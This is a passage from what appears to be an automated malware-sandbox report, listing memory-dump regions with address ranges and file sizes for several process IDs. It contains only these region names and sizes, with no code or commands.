                                                                            2.2MB

                                                                          • memory/1948-47-0x0000000000D60000-0x0000000000FCE000-memory.dmp
                                                                            Filesize

                                                                            2.4MB

                                                                          • memory/1948-5016-0x0000000003350000-0x0000000003360000-memory.dmp
                                                                            Filesize

                                                                            64KB

                                                                          • memory/1948-5138-0x00000000730E0000-0x0000000073890000-memory.dmp
                                                                            Filesize

                                                                            7.7MB

                                                                          • memory/1948-5120-0x0000000001560000-0x00000000015B4000-memory.dmp
                                                                            Filesize

                                                                            336KB

                                                                          • memory/1948-5117-0x00000000068F0000-0x0000000006E94000-memory.dmp
                                                                            Filesize

                                                                            5.6MB

                                                                          • memory/1948-5018-0x0000000006000000-0x000000000607E000-memory.dmp
                                                                            Filesize

                                                                            504KB

                                                                          • memory/1948-135-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-117-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-5019-0x0000000006080000-0x00000000060CC000-memory.dmp
                                                                            Filesize

                                                                            304KB

                                                                          • memory/1948-121-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-124-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-127-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/1948-130-0x0000000005960000-0x0000000005B9B000-memory.dmp
                                                                            Filesize

                                                                            2.2MB

                                                                          • memory/2960-5057-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp
                                                                            Filesize

                                                                            10.8MB

                                                                          • memory/2960-5042-0x000002B6515F0000-0x000002B651600000-memory.dmp
                                                                            Filesize

                                                                            64KB

                                                                          • memory/2960-5040-0x00007FFDE38F0000-0x00007FFDE43B1000-memory.dmp
                                                                            Filesize

                                                                            10.8MB

                                                                          • memory/2960-5041-0x000002B6515F0000-0x000002B651600000-memory.dmp
                                                                            Filesize

                                                                            64KB

                                                                          • memory/2960-5043-0x000002B653AE0000-0x000002B653B0A000-memory.dmp
                                                                            Filesize

                                                                            168KB

                                                                          • memory/3016-24-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3016-23-0x0000000004D50000-0x0000000004D51000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3016-26-0x0000000004D00000-0x0000000004D01000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3016-25-0x0000000004D10000-0x0000000004D11000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3016-22-0x0000000004D20000-0x0000000004D21000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3016-20-0x00000000006C0000-0x0000000000B84000-memory.dmp
                                                                            Filesize

                                                                            4.8MB

                                                                          • memory/3016-775-0x00000000006C0000-0x0000000000B84000-memory.dmp
                                                                            Filesize

                                                                            4.8MB

                                                                          • memory/3016-21-0x0000000004D30000-0x0000000004D31000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3016-18-0x00000000006C0000-0x0000000000B84000-memory.dmp
                                                                            Filesize

                                                                            4.8MB

                                                                          • memory/3016-864-0x00000000006C0000-0x0000000000B84000-memory.dmp
                                                                            Filesize

                                                                            4.8MB

                                                                          • memory/3016-27-0x0000000004D70000-0x0000000004D71000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3532-10-0x0000000004CE0000-0x0000000004CE1000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3532-16-0x00000000007F0000-0x0000000000CB4000-memory.dmp
                                                                            Filesize

                                                                            4.8MB

                                                                          • memory/3532-0-0x00000000007F0000-0x0000000000CB4000-memory.dmp
                                                                            Filesize

                                                                            4.8MB

                                                                          • memory/3532-1-0x00000000774D4000-0x00000000774D6000-memory.dmp
                                                                            Filesize

                                                                            8KB

                                                                          • memory/3532-2-0x00000000007F0000-0x0000000000CB4000-memory.dmp
                                                                            Filesize

                                                                            4.8MB

                                                                          • memory/3532-3-0x0000000004C80000-0x0000000004C81000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3532-4-0x0000000004C90000-0x0000000004C91000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3532-6-0x0000000004CC0000-0x0000000004CC1000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3532-7-0x0000000004C50000-0x0000000004C51000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3532-5-0x0000000004C70000-0x0000000004C71000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3532-9-0x0000000004CB0000-0x0000000004CB1000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3532-8-0x0000000004C60000-0x0000000004C61000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3532-11-0x0000000004CD0000-0x0000000004CD1000-memory.dmp
                                                                            Filesize

                                                                            4KB

                                                                          • memory/3604-120-0x00000000007F0000-0x0000000000856000-memory.dmp
                                                                            Filesize

                                                                            408KB

                                                                          • memory/3604-122-0x00000000730E0000-0x0000000073890000-memory.dmp
                                                                            Filesize

                                                                            7.7MB

                                                                          • memory/3604-138-0x0000000002A60000-0x0000000004A60000-memory.dmp
                                                                            Filesize

                                                                            32.0MB

                                                                          • memory/3604-182-0x00000000730E0000-0x0000000073890000-memory.dmp
                                                                            Filesize

                                                                            7.7MB

                                                                          • memory/4616-877-0x000001E171F00000-0x000001E171F22000-memory.dmp
                                                                            Filesize

                                                                            136KB

                                                                          • memory/4616-859-0x00007FFDE2270000-0x00007FFDE2D31000-memory.dmp
                                                                            Filesize

                                                                            10.8MB

                                                                          • memory/4616-861-0x000001E171F70000-0x000001E171F80000-memory.dmp
                                                                            Filesize

                                                                            64KB

                                                                          • memory/4616-865-0x000001E171F70000-0x000001E171F80000-memory.dmp
                                                                            Filesize

                                                                            64KB

                                                                          • memory/4616-976-0x00007FFDE2270000-0x00007FFDE2D31000-memory.dmp
                                                                            Filesize

                                                                            10.8MB

                                                                          • memory/4616-955-0x000001E171EF0000-0x000001E171EFA000-memory.dmp
                                                                            Filesize

                                                                            40KB

                                                                          • memory/4616-953-0x000001E174570000-0x000001E174582000-memory.dmp
                                                                            Filesize

                                                                            72KB

                                                                          • memory/4616-945-0x000001E171F70000-0x000001E171F80000-memory.dmp
                                                                            Filesize

                                                                            64KB

                                                                          • memory/4720-5030-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                            Filesize

                                                                            172KB